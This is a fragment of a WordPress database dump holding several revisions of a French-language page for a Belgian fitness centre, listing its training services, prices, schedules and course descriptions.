(106, 1, '2013-06-16 14:01:57', '2013-06-16 14:01:57', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n\r\nPrix ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n\r\nHoraire ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:01:57', '2013-06-16 14:01:57', '', 11, 'http://www.crosstrainingcenter.be/?p=106', 0, 'revision', '', 0),
(107, 1, '2013-06-16 14:14:58', '2013-06-16 14:14:58', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:14:58', '2013-06-16 14:14:58', '', 11, 'http://www.crosstrainingcenter.be/?p=107', 0, 'revision', '', 0),
(108, 1, '2013-06-16 14:16:00', '2013-06-16 14:16:00', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:16:00', '2013-06-16 14:16:00', '', 11, 'http://www.crosstrainingcenter.be/?p=108', 0, 'revision', '', 0),
(109, 1, '2013-06-16 14:16:31', '2013-06-16 14:16:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:16:31', '2013-06-16 14:16:31', '', 11, 'http://www.crosstrainingcenter.be/?p=109', 0, 'revision', '', 0),
(111, 1, '2013-06-16 14:17:45', '2013-06-16 14:17:45', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€<br>\r\nSuivi 15,00€\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:17:45', '2013-06-16 14:17:45', '', 11, 'http://www.crosstrainingcenter.be/?p=111', 0, 'revision', '', 0),
(110, 1, '2013-06-16 14:17:07', '2013-06-16 14:17:07', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€<br>\r\nSuivi 15,00€\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:17:07', '2013-06-16 14:17:07', '', 11, 'http://www.crosstrainingcenter.be/?p=110', 0, 'revision', '', 0),
(112, 1, '2013-06-16 14:18:18', '2013-06-16 14:18:18', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:18:18', '2013-06-16 14:18:18', '', 11, 'http://www.crosstrainingcenter.be/?p=112', 0, 'revision', '', 0),
(113, 1, '2013-06-16 14:18:50', '2013-06-16 14:18:50', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:18:50', '2013-06-16 14:18:50', '', 11, 'http://www.crosstrainingcenter.be/?p=113', 0, 'revision', '', 0),
(114, 1, '2013-06-16 14:20:17', '2013-06-16 14:20:17', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color:#999999;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:20:17', '2013-06-16 14:20:17', '', 11, 'http://www.crosstrainingcenter.be/?p=114', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
